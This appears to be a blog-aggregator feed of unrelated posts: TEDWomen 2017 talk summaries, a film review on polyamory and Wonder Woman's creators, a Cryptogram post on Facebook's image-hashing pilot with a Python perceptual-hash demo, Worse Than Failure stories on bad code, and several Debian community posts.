It is the artist’s job to unearth the story that other people try to bury, says Mwende “FreeQuency” Katwiwa. In a gut-wrenching, incisive talk-plus-poetry, she considers reproductive justice in America for black mothers through a poem called “The Joys of Motherhood,” which begins: “I don’t know if I have what it takes to stomach motherhood in this country.” In a world with true reproductive justice, everyone would be able to parent in safe, socially supportive environments, in healthy communities without fear of violence. But America makes no such guarantees for black mothers and their babies. As Mwende says, “[America] has taught me how some women give birth to babies and others to suspects / has taught me that this body will birth kin who are more likely to be held in prison cells than to hold college degrees.” She continues, “there is something about being black in America that has made motherhood sound like mourning.” Mwende ends the talk with a bold call to unite the reproductive justice movement with Black Lives Matter — in fact, she says, it is impossible to separate them.

Who are we without labels? Clemantine Wamariya grew up in Kigali, Rwanda, but when she was six, she was forced to flee genocide with her sister Claire. “You go from a person who’s away from home to a person with no home,” she says. “The place that’s supposed to want you has pushed you out, and no one takes you in. You are unwanted by anyone. You are a refugee.” Eventually, Clemantine and Claire came to the United States … and in a truly American twist, they were reunited with their parents live on Oprah. But her family still rarely speaks about the past. “None of us can make sense of what happened to us,” she says. Rwanda, she reminds us, is not the only country where people have turned on each other. “In order for us to stop the violence that goes on in the world, I beg you to pause. Let’s ask ourselves, who are we without words, who are we without labels? Who are we in our breath? Who are we in our heartbeat?”

Justin Baldoni shares his adventures on Instagram, where his posts about exercise draw male fans, while his posts about loving his wife and parenting his kid speak to women. He wondered: Why is that? He speaks at TEDWomen 2017. Photo: Ryan Lash / TED

Taking the TED stage as himself, not as one of the many fictional men he has played, the actor, filmmaker, and social entrepreneur Justin Baldoni invites men to reject traditional norms of masculinity, to be accountable for and conscious of their actions — and to be vulnerable, express emotions, and disrupt the patriarchy. “I believe the only way that can happen,” he says, “is if men learn to not only embrace the qualities we’ve been told are “feminine” in ourselves, but to be willing to stand up, champion, and learn from the women who embody them.” And, sometimes, he adds, that means having to “shut up and listen.” As a proud feminist, Baldoni understands the privileged space he occupies within society and advocates for action-based activism. “As men, it’s time that we start to see past our privilege and recognize that we are not just part of the problem. Fellas: we are the problem. The glass ceiling exists because we put it there,” he says, “and if we want to be part of the solution, then words are no longer enough.”

“I was a bully.” This powerful admission early in Sally Kohn‘s talk hits hard. She’s always been told she was a nice person who gets along with all types of people, but the political pundit was haunted by a memory from grade school of mercilessly bullying another kid, with cruel words that stayed fresh in her mind long after every other fact about fifth grade was forgotten. That memory, along with a noticeable increase in recent hateful thoughts in the world at large, made her question the way people described her and even how she thought of herself: “What if I wasn’t a nice person at all — but really just a hateful monster?” She wanted to understand this early episode of bullying in her life within the broader context of hate and its growing influence in the world, and she began to ask questions. One serious truth she found as she literally wrote a book about hate (“Spoiler: I’m against it”): It isn’t enough to fight against big hateful expressions and actions, but also the small, everyday ones too.

In confronting her own history as a bully, Sally Kohn examines the continuum of hate — and finds that even the smallest act can be part of that continuum. On the other hand, she says, change is possible. She speaks at TEDWomen 2017. Photo: Stacie McChesney / TED


TEDA glimpse of a bold new future: Notes from Session 2 of TEDWomen 2017: Design

Host Alaa Murabit, a physician and activist, spoke at TEDWomen in 2015; she returns now in 2017 to host a bold session about design of all kinds, from medical breakthroughs to the simple dignity of being true to yourself. Photo: Ryan Lash / TED

Up bright and early in the Big Easy, and right back into the TEDWomen program, with a session hosted by physician and UN High Commissioner (and a past TEDWomen speaker herself) Alaa Murabit, who confesses that she was pleasantly confused to find herself helming a session featuring all things design. “I always thought design was about externally pleasing aesthetics,” she said, confessing that her own design skills are … limited. “But what you’ll learn from speakers in this session is that design isn’t just about how great something looks — but how well it works.” Ready? Ready:

How do you design for the wonders of science? Growing up, neuroscientist-turned-designer Amanda Phingbodhipakkiya watched how her father would encourage diners in his Thai restaurant to embrace the unfamiliar. Now, she applies this same spirit to science activism, attempting to “introduce the wonder and humanity of science to the world, just like my dad introduced Thai food to our neighbors.” Her own experiments so far have resulted in creating Beyond Curie, a series of illustrations highlighting historical badass women in STEM and a scientifically rigorous, yet visually compelling pop-up science museum for adults. Most recently, she started a fashion line and community for women and girls to express their love of science — and find each other in the process.

Giving new meaning to remote work. “We’re just getting inside the joint now,” says Nadine Hachach-Haram as she peers into her laptop. She’s not kidding — she’s helping a surgeon based in Minnesota to drill into a patient’s knee, using her webcam to provide direction and feedback on what he should do next. Remote, collaborative surgeries like this, she says, can provide the next wave of surgical innovation, likely to have as dramatic an impact on humanity as the discovery of antiseptic or the use of robotics in the operating room. With her system, called Proxima, an experienced surgeon can advise another surgeon on a procedure, live, using AR and a laptop camera. It’s early days, but the hope is to provide a lifeline for the 5 billion people who lack access to safe surgical care. Says one mother whose child received cleft palate surgery in her Peruvian village, directed by a surgeon in California, “this technology gave my daughter her smile.”

Born to invent. In 2016 Anushka Naiknaware of Portland, Oregon, became the youngest winner — at age 13 — of the Google Science Fair when she designed a sensor that tracks wound healing. Driven by a fascination with how the world works, she learned about wounds that don’t heal normally due to preexisting conditions such as diabetes — and was shocked by their prevalence and cost ($50 billion worldwide in 2010). Since there’s a correlation between the moisture level of a wound and its stage of healing, Naiknaware worked in her garage to combine materials science, fractal math and biology to create a sensor that wirelessly delivers wound information to both patient and doctor. Did we mention she was 13 when she did this? But Anushka says she’d rather people be inspired by her story to make their own difference.

Young inventor Anushka Naiknaware has a passion to solve problems and to learn as much as she can about everything possible. She speaks at TEDWomen 2017: Bridges, on November 2, 2017, at the Orpheum Theatre in New Orleans. Photo: Ryan Lash / TED

Be true to yourself. Asali DeVan Ecclesiastes is a writer and activist who comes to the stage with a powerful poem about our self and our world — and the struggle to bring our true selves to everything we do. Two excerpts from her poem, Chasms:

there are some chasms
so deep and so wide
it’s hard to imagine how we make it
safely to the other side
that space between who we are
and who we want to be
the gaps that separate our high ideals
from our base realities
the distance between what we say
and what we really mean

we often find ourselves
fighting hard in the paint
to hold onto images of what we ain’t
so while our dreams coincide
our fears collide
and we want to know one another
but think we can’t

Asali DeVan Ecclesiastes speaks her powerful poem Chasms to an enrapt audience at TEDWomen 2017. Photo: Stacie McChesney / TED

The power of physical exercise. Neuroscientist Wendy Suzuki was working on the study of memory, but after she signed up at a gym and noticed improvement in her own memory and focus, she realized she had to switch her focus: now, she researches the impact of exercise on the brain, and she’s found some surprising stuff. Her work and the work of others has shown that exercise transforms your brain in three primary ways. First, it increases levels of neurotransmitters that affect your mood. Second, over the long term, exercise actually changes the brain’s anatomy, physiology and function. And finally, it helps protect your brain from neurodegenerative diseases as you age. So how often do you have to exercise to get these benefits? Suzuki says you’ve got to get your heart rate pumping three or four times a week for 30–45 minutes each time. Good news: Aerobic vacuuming totally counts.

Wendy Suzuki studies how regular exercise affects the brain in three important ways. She speaks at TEDWomen 2017: Bridges, in New Orleans. Photo: Ryan Lash / TED

Everyone, everywhere deserves good design. If architect and writer John Cary has his way, women will never need to stand in pointlessly long bathroom lines again. He points to these lines as “representative of a more serious issue”: the lack of diversity in design that leads to thoughtless, compassionless spaces. “Design has a unique ability to dignify. It can make people feel valued, respected, honored and seen,” he says. The flip side is true, too, and those bathroom lines tell women their needs were not considered when these rooms were created. Design is a white male-dominated profession, Cary notes: only 15 percent of registered architects in the US are women; a far lower percentage are non-white. He calls for the architecture and the design professions to expand their ranks and commit to serving the public good, not just the privileged few. “Well-designed spaces are not just a matter of space or a question of aesthetics,” he says. “They literally shape our ideas of who we are in the world and what we deserve.” We all deserve better.


Sociological ImagesThank you, Angela Robinson: A Review Of Professor Marston and The Wonder Women

Originally Posted at Marx in Drag

I have been interested in and reading about the creators of the comic book super hero Wonder Woman for a few years now. My interest began in 2014.

I was half-heartedly listening to Fresh Air with Terry Gross, and Gross was interviewing historian Jill LePore, the author of The Secret History of Wonder Woman. At the time, I hadn’t read LePore’s book or the Wonder Woman comics, and so I was mildly but not wildly interested in their conversation. When Gross asked LePore to talk about William Marston’s family life, LePore began to describe the relationship between Marston, Elizabeth Holloway, Marston’s wife, and Olive Byrne, the woman who lived with them and was, in Terry Gross’s words, Marston’s “mistress.”

Holy shit!, I said to myself. These people were polyamorous! Of course, I knew that they couldn’t have seen themselves as “polyamorous” in the contemporary sense of the word, for the word would not be invented for another fifty years or so after Marston and Holloway invited Byrne into their relationship. However, it sounded to me like they were doing something akin to a poly relationship—as in they had chosen to forge an intimate relationship that included more than two people, and they had built a life together.

In a word, I was hailed. I felt a sense of connection to Holloway, Byrne, and Marston—dare I say queer kinship. I am poly and so were these people from almost a century ago. These are my people! And here were Terry Gross and Jill LePore talking about it on the usually rather conventional National Public Radio. This doesn’t happen often, so I stopped what I was doing and turned up my radio.

After LePore described the relationship between Holloway, Byrne, and Marston, Terry Gross said, “That’s just so bizarre.” And LePore agreed, “Yeah. It’s so bizarre…hilariously bizarre.”

My bubble burst. Instead of being hailed, I felt slapped in the face. I don’t know what Gross’s or LePore’s relationship history looks like, but they certainly sounded like monogamists looking in at us poly freaks from the outside, and they were calling us bizarre and laughing at us. A much too common experience.

That is why Angela Robinson’s film, Professor Marston and The Wonder Women, is the real breath of Fresh Air.

I’ll be honest, I went to this film with some trepidation. I wanted to believe I wouldn’t be mocked or depicted as a bizarre spectacle given Angela Robinson’s resume, but polyamory? Between a man and two women? With kink? It would be very easy for Robinson to spill this very tall order.

I was worried that it wouldn’t do justice to just how unconventional the Marstons were. I was concerned it would perpetuate stereotypes about polygamy–dominant, selfish, and exploitive yet lucky (wink wink) men have multiple and suffering wives. I read LePore’s book, and as I write in my forthcoming book, The Poly Gaze, she often interprets the Marston family through this lens. I also didn’t want to see yet another film about a man with a wife and mistress and the bitter, catty, and destructive rivalry between the women.

Though understandable given the lack of feminist and/or queer representations of threesomes or poly triads in mainstream media, my fears and worries turned out to be completely unfounded. Rather than make a spectacle out of the perverts or freaks, Robinson adeptly turns the tables and asks the viewer to question their own assumptions about what is normal. It renders polyamory possible and highlights the dire social sanctions that often come with not living within the boundaries of monogamy. The film also offers a truly rare representation of sexual threesomes as a loving and sexy way to forge intimate bonds, and presents BDSM as a component of healthy relationships rather than a result of psychopathology or sexual trauma (think Fifty Shades of Grey).

All of this is rather groundbreaking, and I was, quite literally, in tears as I watched. Tears of joy and relief for being hailed as polyamorous, an enthusiastic participant in threesomes, and a dabbler in kink and not getting slapped in the face with mocking laughter or the pointing fingers of shame.

But these things were not, for me personally, the most unique and striking aspect of this film—though, to be perfectly clear, I do not want to diminish just how significant this film is in its bravery and beauty around polyamory, bisexuality, and kink. The most astonishingly wonderful thing about Angela Robinson’s film version of this story, as seen from my theatre seat, was being hailed as a feminist. Gazing at Elizabeth and Olive admire, fall in love with, and express desire for each other as lovers, not rivals. And even more significant was to witness them consciously and deliberatively (not deliberately, though that works too) choose to forge an unconventional and poly life together with Marston.

Unlike narratives about polygamy where women are passive objects of men’s brutality or desire, this film shows Elizabeth and Olive actively creating a life together and with a man who is an equal partner. Refusing to reproduce tropes about women’s competition with each other for the attention of a man, Angela Robinson situates the women’s admiration and desire for each other at the center of the story. Both women are brilliant feminists. And both women are, as Olive says about Elizabeth, “magnificent” and desirous of an unconventional life.

In other words, Angela Robinson has succeeded in transforming a story about a man with a wife and a mistress (as told by Gross and LePore) into two women and a man who bravely forge an unconventional, poly and feminist life.

Whether or not it is an accurate portrayal of the lived experience of Holloway, Byrne, and Marston is impossible to know, and to be perfectly frank, completely uninteresting to me. I am interested in the stories we tell—as historians and as filmmakers and what those stories say about people who live unconventional lives.

I cherish the story told in this film by Angela Robinson because of what it says about those of us who live unconventional, poly lives. Yes, we are freaks, but only in the eyes of those who live conventional lives and want everyone else to follow the rules. Yes, we are sometimes ridiculed and shunned, and yet, because of it, we are brave, strong, and resilient. And some of us, like Elizabeth Holloway, Olive Byrne, and William Marston, and the character Wonder Woman, for that matter, are capable of changing the world. Thank you, Angela Robinson, for telling this part of the story.

Mimi Schippers is an Associate Professor of Sociology and Gender and Sexuality Studies at Tulane University. She is the author of Beyond Monogamy: Polyamory and the Future of Polyqueer Sexualities (New York University Press, 2016) and Rockin’ Out of the Box: Gender Maneuvering in Alternative Hard Rock (Rutgers University Press, 2002).

(View original at https://thesocietypages.org/socimages)

CryptogramFacebook Fingerprinting Photos to Prevent Revenge Porn

This is a pilot project in Australia:

Individuals who have shared intimate, nude or sexual images with partners and are worried that the partner (or ex-partner) might distribute them without their consent can use Messenger to send the images to be "hashed." This means that the company converts the image into a unique digital fingerprint that can be used to identify and block any attempts to re-upload that same image.

I'm not sure I like this. It doesn't prevent revenge porn in general; it only prevents the same photos being uploaded to Facebook in particular. And it requires the person to send Facebook copies of all their intimate photos.
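To make concrete what "hashed" means here, and why a fingerprint can only catch a copy of the same photo, here is an added Python example; it is not Facebook's code, and the post does not say which matching technique Facebook uses. It contrasts a cryptographic hash of the pixel data, which changes completely when any pixel changes, with a simple perceptual "average hash" that survives small edits. The 16x16 grayscale gradient, the one-unit brightening that stands in for a re-encode, the inverted "unrelated" image, and the blocklist matcher with its Hamming-distance threshold are all constructed for this example.

```python
import hashlib
from typing import List

# A grayscale image is a list of rows, each row a list of 0..255 values.
Image = List[List[int]]


def make_sample_image(size: int = 16) -> Image:
    """Constructed sample input: a diagonal gradient from 0 to 240."""
    return [[(x + y) * 8 for x in range(size)] for y in range(size)]


def brighten(img: Image, delta: int = 1) -> Image:
    """Copy with every pixel shifted by delta (clamped to 0..255).
    Stands in for the small changes a re-encode or edit introduces."""
    return [[max(0, min(255, v + delta)) for v in row] for row in img]


def invert(img: Image) -> Image:
    """A visually unrelated image, used to check for false matches."""
    return [[255 - v for v in row] for row in img]


def sha256_fingerprint(img: Image) -> str:
    """Cryptographic hash of the raw pixel bytes: any change alters it."""
    return hashlib.sha256(bytes(v for row in img for v in row)).hexdigest()


def average_hash(img: Image, grid: int = 8) -> int:
    """Perceptual 'average hash': shrink to grid x grid blocks and set one
    bit per block that is brighter than the overall mean (grid*grid bits)."""
    height, width = len(img), len(img[0])
    bh, bw = height // grid, width // grid
    means = []
    for by in range(grid):
        for bx in range(grid):
            block = [img[y][x]
                     for y in range(by * bh, (by + 1) * bh)
                     for x in range(bx * bw, (bx + 1) * bw)]
            means.append(sum(block) / len(block))
    overall = sum(means) / len(means)
    bits = 0
    for m in means:
        bits = (bits << 1) | (1 if m > overall else 0)
    return bits


def hamming(a: int, b: int) -> int:
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def matches_blocklist(candidate: Image, blocklist: List[int],
                      max_distance: int = 5) -> bool:
    """True if the candidate's perceptual hash is within max_distance bits
    of any blocked hash. The threshold is a tuning choice: too high and
    unrelated images are blocked, too low and edited copies slip through."""
    h = average_hash(candidate)
    return any(hamming(h, blocked) <= max_distance for blocked in blocklist)


def demo() -> dict:
    """Register one image, then test a slightly edited copy and an
    unrelated image against the blocklist with both kinds of hash."""
    original = make_sample_image()
    reuploaded = brighten(original, 1)   # same photo, re-encoded a bit brighter
    unrelated = invert(original)
    blocklist = [average_hash(original)]
    return {
        "sha256_same": sha256_fingerprint(original) == sha256_fingerprint(reuploaded),
        "ahash_distance": hamming(average_hash(original), average_hash(reuploaded)),
        "reupload_blocked": matches_blocklist(reuploaded, blocklist),
        "unrelated_distance": hamming(average_hash(original), average_hash(unrelated)),
        "unrelated_blocked": matches_blocklist(unrelated, blocklist),
    }


if __name__ == "__main__":
    print(demo())
```

The exact-hash match fails on the brightened copy while the perceptual hash still matches at distance 0, and the inverted image lands 56 bits away, far outside the threshold. The same property that lets a perceptual hash tolerate re-encoding is what makes the threshold a policy decision: the service is trading false negatives against false positives on intimate images it has, by design, been handed in the clear.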

Facebook will store these images for a short period of time before deleting them to ensure it is enforcing the policy correctly, the company said.

At least there's that.

More articles.

EDITED TO ADD: It's getting worse:

According to a Facebook spokesperson, Facebook workers will have to review full, uncensored versions of nude images first, volunteered by the user, to determine if malicious posts by other users qualify as revenge porn.

Worse Than FailureTheory Versus Reality

I went to college at the State University of New York at Albany, where back then, most of the Computer Science curriculum courses were entitled Theory of xxx. The programming assignments were the usual small-scope demonstrations of some feature of programming, typically something an experienced developer would code in 15-20 LOC.

My Master's project was to modify the TeX typesetting system (by Knuth) to leverage the more advanced features of a new typesetting system. It took me about two months to reverse engineer it only to find that the entire required modification amounted to a single character change.


The theory sunk in, but there was no practical application of it to reality.

Fast forward to my first programming job, where one of my tasks was to write a stand-alone program that would read connection names from a file, verify that they were valid, and use them for something. There were about 350 different connection names, but they didn't follow any discernible pattern. There were a variety of letters and numbers in no particular ordering. However, there was a lot of substring duplication within the names.

Being a clueless but diligent noob, it dawned on me that I could leverage those semi-duplications so I wrote a huge progressive if-then-else statement to determine whether a name was valid.

For example, the list contained names like:

   AXLP1122
   AXLP1133
   BCXQ5566
   BCYZ7788

The code was in FORTRAN IV, so I'll just use pseudo code here. The logic for that little sub list looked like this:

   if (name.startsWith("AXLP11"))
      if (name.substring(6) = "22" or name.substring(6) = "33")
          name is valid
   else if (name.startsWith("BC"))
      if (name.substring(2) = "XQ5566" or name.substring(2) = "YZ7788")
          name is valid
   else ...

This proceeded to about 5 levels deep and comprised several hundred lines of code. I even built a test case to verify every single one of the names.

Then I proudly turned it in to my boss, who instantly proceeded to laugh in my face. He pointed out that it would take forever to run through all of that logic for each of the millions of records (back then, the CPUs ran at a little below 4MHz with very little RAM), and that perhaps I should consider using an array and a binary search lookup.

It was at that moment that I realized the fallacy of taking only courses entitled Theory of xxx, that perhaps my college tuition didn't buy me all I had hoped, and started a years-long effort to learn Practical Application of xxx to make myself better at what I did.



Planet DebianNeil McGovern: Software Freedom Law Center and Conservancy

Before I start, I would like to make it clear that the below is entirely my personal view, and not necessarily that of the GNOME Foundation, the Debian Project, or anyone else.

There’s been quite a bit of interest recently about the petition by Software Freedom Law Center to cancel the Software Freedom Conservancy’s trademark. A number of people have asked my views on it, so I thought I’d write up a quick blog on my experience with SFLC and Conservancy both during my time as Debian Project Leader, and since.

It’s clear to me that for some time, there’s been quite a bit of animosity between SFLC and Conservancy, which for me started to become apparent around the time of the large debate over ZFS on Linux. I talked about this in my DebConf 16 talk, which fortunately was recorded (ZFS bit from 8:05 to 17:30).


This culminated in SFLC publishing a statement, and Conservancy also publishing their statement, backed up by the FSF. These obviously came to different conclusions, and it seems bizarre to me that SFLC who were acting as Debian’s legal counsel published a position that was contrary to the position taken by Debian. Additionally, Conservancy and FSF who were not acting as counsel mirrored the position of the project.

Then, I hear of an even more confusing move – that SFLC has filed legal action against Conservancy, despite being the organisation they helped set up. This happened on the 22nd September, the day after SFLC announced corporate and support services for Free Software projects.

SFLC has also published a follow up, in which they say that the act “is not an attack, let alone a ‘bizarre’ attack”, and that the response from Conservancy, who view it as such, “was like reading a declaration of war issued in response to a parking ticket”. Then, as SFLC somehow find the threat of your trademark being taken away as something other than an attack, they also state: “Any project working with the Conservancy that feels in any way at risk should contact us. We will immediately work with them to put in place measures fully ensuring that they face no costs and no risks in this situation.” which I read as a direct pitch to try and pull projects away from Conservancy and over to SFLC.

Now, even if there is a valid claim here, despite the objections that were filed by a trademark lawyer who I have a great deal of respect for (disclosure: Pam also provides pro-bono trademark advice to my employer, the GNOME Foundation), the optics are pretty terrible. We have a case of one FOSS organisation taking another one to court, after many years of them being aware of the issue, and when wishing to promote a competing service. At best, this is a distraction from the supposed goals of Free Software organisations, and at worst is a direct attempt to interrupt the workings of an established and successful umbrella organisation which lots of projects rely on.

I truly hope that this case is simply dropped, and if I was advising SFLC, that’s exactly what I would suggest, along with an apology for the distress. Put it this way – if SFLC win, then they’re simply displaying what would be viewed as an aggressive move to hold the term “software freedom” exclusively to themselves. If they lose, then it shows that they’re willing to do so to another 501(c)3 without actually having a case.

Before I took on the DPL role, I was under the naive impression that although there were differences in approach, at least we were coming to try and work together to promote software freedoms for the end user. Unfortunately, since then, I’ve now become a lot more jaded about exactly who, and which organisations hold our best interests at heart.

(Featured image by Nick Youngson – CC-BY-SA-3.0 – http://nyphotographic.com/)

Planet DebianDirk Eddelbuettel: R / Finance 2018 Call for Papers

The tenth (!!) annual R/Finance conference will take place in Chicago on the UIC campus on June 1 and 2, 2018. Please see the call for papers below (or at the website) and consider submitting a paper.

We are once again very excited about our conference, thrilled about who we hope may agree to be our anniversary keynotes, and hope that many R / Finance users will not only join us in Chicago in June -- and also submit an exciting proposal.

So read on below, and see you in Chicago in June!

Call for Papers

R/Finance 2018: Applied Finance with R
June 1 and 2, 2018
University of Illinois at Chicago, IL, USA

The tenth annual R/Finance conference for applied finance using R will be held June 1 and 2, 2018 in Chicago, IL, USA at the University of Illinois at Chicago. The conference will cover topics including portfolio management, time series analysis, advanced risk tools, high-performance computing, market microstructure, and econometrics. All will be discussed within the context of using R as a primary tool for financial risk management, portfolio construction, and trading.

Over the past nine years, R/Finance has included attendees from around the world. It has featured presentations from prominent academics and practitioners, and we anticipate another exciting line-up for 2018.

We invite you to submit complete papers in pdf format for consideration. We will also consider one-page abstracts (in txt or pdf format) although more complete papers are preferred. We welcome submissions for both full talks and abbreviated "lightning talks." Both academic and practitioner proposals related to R are encouraged.

All slides will be made publicly available at conference time. Presenters are strongly encouraged to provide working R code to accompany the slides. Data sets should also be made public for the purposes of reproducibility (though we realize this may be limited due to contracts with data vendors). Preference may be given to presenters who have released R packages.

Please submit proposals online at http://go.uic.edu/rfinsubmit. Submissions will be reviewed and accepted on a rolling basis with a final submission deadline of February 2, 2018. Submitters will be notified via email by March 2, 2018 of acceptance, presentation length, and financial assistance (if requested).

Financial assistance for travel and accommodation may be available to presenters. Requests for financial assistance do not affect acceptance decisions. Requests should be made at the time of submission. Requests made after submission are much less likely to be fulfilled. Assistance will be granted at the discretion of the conference committee.

Additional details will be announced via the conference website at http://www.RinFinance.com/ as they become available. Information on previous years' presenters and their presentations is also at the conference website. We will make a separate announcement when registration opens.

For the program committee:

Gib Bassett, Peter Carl, Dirk Eddelbuettel, Brian Peterson,
Dale Rosenthal, Jeffrey Ryan, Joshua Ulrich

Planet DebianDirk Eddelbuettel: RQuantLib 0.4.4: Several smaller updates

A shiny new (mostly-but-not-completely maintenance) release of RQuantLib, now at version 0.4.4, arrived on CRAN overnight, and will get to Debian shortly. This is the first release in over a year, and it contains (mostly) a small number of fixes throughout. It also includes the update to the new DateVector and DatetimeVector classes which become the default with the upcoming Rcpp 0.12.14 release (just like this week's RcppQuantuccia release). One piece of new code is due to François Cocquemas who added support for discrete dividends to both European and American options. See below for the complete set of changes reported in the NEWS file.

As with release 0.4.3 a little over a year ago, we will not have new Windows binaries from CRAN as I apparently have insufficient powers of persuasion to get CRAN to update their QuantLib libraries. So we need a volunteer. If someone could please build a binary package for Windows from the 0.4.4 sources, I would be happy to once again host it on the GHRR drat repo. Please contact me directly if you can help.

Changes are listed below:

Changes in RQuantLib version 0.4.4 (2017-11-07)

  • Changes in RQuantLib code:

    • Equity options can now be analyzed via discrete dividends through two vectors of dividend dates and values (Francois Cocquemas in #73 fixing #72)

    • Some package and dependency information was updated in files DESCRIPTION and NAMESPACE.

    • The new Date(time)Vector classes introduced with Rcpp 0.12.8 are now used when available.

    • Minor corrections were applied to BKTree, to vanilla options for the case of intraday time stamps, to the SabrSwaption documentation, and to bond utilities for the most recent QuantLib release.

Courtesy of CRANberries, there is also a diffstat report for this release. As always, more detailed information is on the RQuantLib page. Questions, comments etc should go to the rquantlib-devel mailing list off the R-Forge page. Issue tickets can be filed at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Worse Than FailureCodeSOD: Lowest-Bidder Conversion

Circa 2003, or so, Annie’s employer contracted a lowest-bidder to produce a relatively massive .NET Web Forms project. The code was built, signed off, and chucked into production without any of the in-house developers being involved, despite being the team that would support it in the long term. There was no documentation, no knowledge transfer, and no code review.

Over the next few years, there was a rush of feature requests as gaps in functionality were found. A series of in-house developers passed through, doing their best to patch them in, but the original project’s code quality didn’t exactly make it maintainable, and since they were operating in a rush, they weren’t exactly improving the code quality.

Fast forward to 2017, and the code is finally unmaintainable enough that someone put together the budget for a ground-up rewrite in .NET MVC, and once again shopped it around to a different lowest-bidder, who would do the conversion. This time, at least, Annie gets to review the code before they accept it. It isn’t going well.

private string AddOne(int DecimalPlace)
{
    string Outpout = ".";
    for (int i = 1; i < DecimalPlace; i++)
    {
        Outpout = Outpout + "0";
    }
    Outpout = Outpout + "1";
    return Outpout;
}

Yes, that’s a stringly-typed operation to create a number in the form “.00001”.

But don’t worry, we can also get the integer value of any string (or any object), nice and easy:

/// <summary>
/// Get Integer Value.
/// </summary>
/// <param name="obj">Object type obj</param>
/// <returns></returns>
public int GetIntegerValue(object obj)
{
    return GetIntegerValue(obj, 0);
}
public int GetIntegerValue(object obj, int defaultReturnValue)
{
    try
    {
        if (obj != null && obj.ToString().Length > 0)
        {
            string objvalue = ClearSpecialChar(Convert.ToString(obj));
            defaultReturnValue = Convert.ToInt32(objvalue);
        }
        //else
        //{
        //    defaultReturnValue = Convert.ToInt32(obj);
        //}
    }
    catch
    {

    }
    return defaultReturnValue;
}

The module also needs to handle rounding, and yes, that’s also stringly-typed.

/// <summary>
/// This Methods for round off item weight for(USPS)
/// EX: .15 Pound =1 Pound
/// </summary>
/// <param name="inPutVal"></param>
/// <returns></returns>
public int MakeRoundOffDecimal(string inPutVal)
{
    int contenerVal = 0;
    int intValAfterPoint = 0;

    string ValBeforePoint = inPutVal.Substring(0, inPutVal.IndexOf('.'));
    string valAfterPoint = inPutVal.Substring(inPutVal.IndexOf('.') + 1);

    try
    {
        contenerVal = Convert.ToInt32(ValBeforePoint);
        intValAfterPoint = Convert.ToInt32(valAfterPoint);
        if (intValAfterPoint > 0)
        {
            contenerVal += 1;
        }
    }
    catch
    {
        contenerVal += 1;
    }
    return contenerVal;
}

/// <summary>
/// This Method  Can make decimal value with desiger
/// length with updating last number (if last number after decimel point >=5 then 6 and lessthan <5 then
/// the same value
/// Ex:- 10.012547 will be 10.01255 if i call this method with GetDecimalPlaceValue("10.012547",5)
/// and 12.012351 will be 12.01235 if i cakll this method with GetDecimalPlaceValue("12.012351",5)
/// </summary>
/// <param name="Value"></param>
/// <param name="DecimalPlace"></param>
/// <returns></returns>
public virtual decimal GetDecimalPlaceValue(string Value, int DecimalPlace)
{
    decimal RetunValue = 0.00M;
    int NextToDecimalPlaceValue = 0;
    int DecimalPlaceValue = 0;
    string InputValue = Value;
    try
    {
        RetunValue = Convert.ToDecimal(InputValue.Substring(0, (InputValue.IndexOf('.') + DecimalPlace + 1)));
        NextToDecimalPlaceValue = GetIntegerValue(InputValue.Substring(RetunValue.ToString().Length, 1));
        if (NextToDecimalPlaceValue > 4)
        {
            RetunValue = RetunValue + Convert.ToDecimal(AddOne(DecimalPlace));
        }
    }
    catch
    {
        RetunValue = GetDecimelValue(Value);
    }
    return RetunValue;
}

If you note, the GetDecimalPlaceValue method claims to round (despite not being named anything like it), but will round numbers off incorrectly: the input 1.9 yields 1.
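To make the failure concrete, here is an added Python port of GetDecimalPlaceValue (not the contractor's C#) next to a correct Decimal.quantize version. ClearSpecialChar is not ported (a plain int() parse fails on the same inputs), the undefined GetDecimelValue fallback is assumed to parse the whole string, and Python slicing returns "" where C# Substring would throw into that same fallback.

```python
from decimal import Decimal, ROUND_HALF_UP, InvalidOperation


def add_one(decimal_place: int) -> str:
    """Port of AddOne: the string '.0...01' with decimal_place digits."""
    return "." + "0" * (decimal_place - 1) + "1"


def get_integer_value(obj, default: int = 0) -> int:
    """Port of GetIntegerValue: swallow every parse failure and hand back the default."""
    try:
        if obj is not None and len(str(obj)) > 0:
            return int(str(obj))
    except ValueError:
        pass
    return default


def stringly_round(value: str, decimal_place: int) -> Decimal:
    """Port of GetDecimalPlaceValue, bugs included: truncate at the decimal point plus
    decimal_place characters, then peek at the next character of the *string* and
    bump the last digit if it parses as > 4."""
    try:
        kept = value[: value.index(".") + decimal_place + 1]
        ret = Decimal(kept)            # Decimal("1.") is 1, exactly as Convert.ToDecimal
        start = len(str(ret))          # the original indexes by the length of ToString()
        next_char = value[start:start + 1]
        if get_integer_value(next_char) > 4:
            ret = ret + Decimal(add_one(decimal_place))
        return ret
    except (ValueError, InvalidOperation):
        # Assumed behaviour of the fallback GetDecimelValue(Value), not shown on the page.
        return Decimal(value)


def round_half_up(value: str, places: int) -> Decimal:
    """What the doc comment actually promises: round to `places` digits, ties rounding up."""
    return Decimal(value).quantize(Decimal(1).scaleb(-places), rounding=ROUND_HALF_UP)


def compare(value: str, places: int) -> tuple:
    """(stringly result, correct result) for one input, for side-by-side inspection."""
    return stringly_round(value, places), round_half_up(value, places)


if __name__ == "__main__":
    for v, p in (("1.9", 0), ("2.5", 0), ("10.012547", 5), ("12.012351", 5)):
        print(v, p, "->", compare(v, p))
```

With zero decimal places the kept string is "1." and the "next character" is the dot itself, which GetIntegerValue silently turns into 0, so 1.9 and 2.5 both come back as 1 and 2.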

Calls to these various methods are peppered throughout the code base. It appears to be a common utility library that’s simply dropped into every project by this lowest-bidder contractor, and everyone on their team knows to use this for data type conversions.

Annie raised her issues with management, who raised it with their lowest-bidder. Unfortunately, as the lowest-bidder, they’ve already been paid for the first milestone, and are perfectly happy to drag their feet until the code quality issues are forgotten before they bother delivering the second.


Planet DebianJonathan Dowland: Christmas

Every year, family members ask me to produce a list of gift suggestions for them to buy for me for Christmas. An enviable position for many, I'm sure, but combined with trying to come up with gift ideas for them, this can sometimes be a stressful situation, with a risk of either giving or receiving gifts that are really nothing more than tat, fluff or kipple. I've started to feel that this is detracting from the spirit of the season.

I also don't really want much "stuff". When I am interested in something, it's not something that is convenient for others to buy, either because it's hard to describe, or has limited availability, or is only available at particular times of the year, etc. I'd rather focus on spending time with friends and family.

Starting this year, I'm asking that people who wish to do so donate to a charity on my behalf instead. The charity I have chosen for this year is St. Oswald's Hospice.

Planet Linux AustraliaPia Waugh: FWD50 Keynote: The Tipping Point

